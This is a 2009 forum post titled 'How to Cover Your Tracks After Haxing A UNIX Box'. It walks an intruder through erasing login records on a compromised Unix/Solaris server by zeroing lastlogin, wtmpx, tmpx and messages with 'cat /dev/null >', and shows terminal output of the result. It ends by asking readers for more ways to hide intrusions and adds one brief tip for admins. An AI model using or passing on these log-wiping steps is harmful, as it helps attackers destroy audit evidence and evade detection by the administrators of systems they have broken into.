How to Cover Your Tracks After Haxing A UNIX Box | JamiiForums | The Home of Great Thinkers

Dismiss Notice
You are browsing this site as a guest. It takes 2 minutes to CREATE AN ACCOUNT and less than 1 minute to LOGIN

How to Cover Your Tracks After Haxing A UNIX Box

Discussion in 'Tech, Gadgets & Science Forum' started by SnEafer, Apr 2, 2009.

  1. SnEafer

    SnEafer Senior Member

    Apr 2, 2009
    Joined: Apr 1, 2009
    Messages: 154
    Likes Received: 0
    Trophy Points: 0
    I read this article posted by anton ***i think **** and some how he mentioned few tricks to know when someone has haxed your system,

    Well he did said said few tricks a haxer could use but i think he wasn't aware of the trick that i'll show below : -

    Here are some ways of covering your fingerprints on a server using the files that monitors user logins. ***in linux/unix***.
    We want to erase any trace that will show that we were inside the box. In doing so we’ll just:
    cat /dev/null > <file>
    Lastlog file
    Clear out the last log file if you’re using an existing user from the box. Lastlogin file shows when and where a particular user last login from.
    login: razile
    Last login: Fri Oct 21 21:50:02 2007 from
    Sun Microsystems Inc. SunOS 5.9 Generic May 2002
    razile@unix-box %
    Erase that if you don’t want the admin see where you last login from (IP, hostname, time etc)
    cat /dev/null > /var/adm/lastlogin
    After clearing the lastlog file, comparing the first login and the second one:
    (first login)
    Last login: Thu Nov 1 21:33:41 2007 from
    Sun Microsystems Inc. SunOS 5.9 Generic May 2002
    (after deletion)
    Sun Microsystems Inc. SunOS 5.9 Generic May 2002
    bash: unalias: `e’: not an alias
    wtmpx/tmpx files
    If you want to check those users who logged in to a Unix box, type in ‘last’
    UnixBox# last | more
    root pts/21 Sat Nov 3 11:38 still logged in
    sitescp pts/20 Sat Nov 3 07:00 still logged in
    root pts/23 Sat Nov 3 05:05 still logged in
    root pts/22 Sat Nov 3 05:05 still logged in
    paladel pts/22 Fri Nov 2 14:33 - 15:32 (00:59)
    boy1 pts/26 Fri Nov 2 13:22 - 14:50 (01:28)
    boy2 pts/26 Fri Nov 2 13:20 - 13:22 (00:02)
    You’ll see the user who was logged in, the terminal used, the IP where he came from the date or duration of his activity in the server.
    That is a lot of information, so in covering up your track, delete or zero out the files that stores these information
    cat /dev/null > /var/adm/wtmpx
    cat /dev/null > /var/adm/tmpx
    After doing so, you’ll get this when doing ‘last’
    # cat /dev/null > /var/adm/wtmpx
    # last | more
    wtmp begins Sun Nov 4 00:41
    You could also zero out the /var/adm/messages if you’re really paranoid.
    Of course doing these is like shouting and telling the whole universe that you were there.
    These are just a few to cover you track… Do you have any additions? Or any tips in covering the intrusion without knowing that you were there?

    For admins : -

    Making a copy of every connection on a cd (burning) is very hard for a haxer to temper with those data.

    But remember not all admins do that ;-)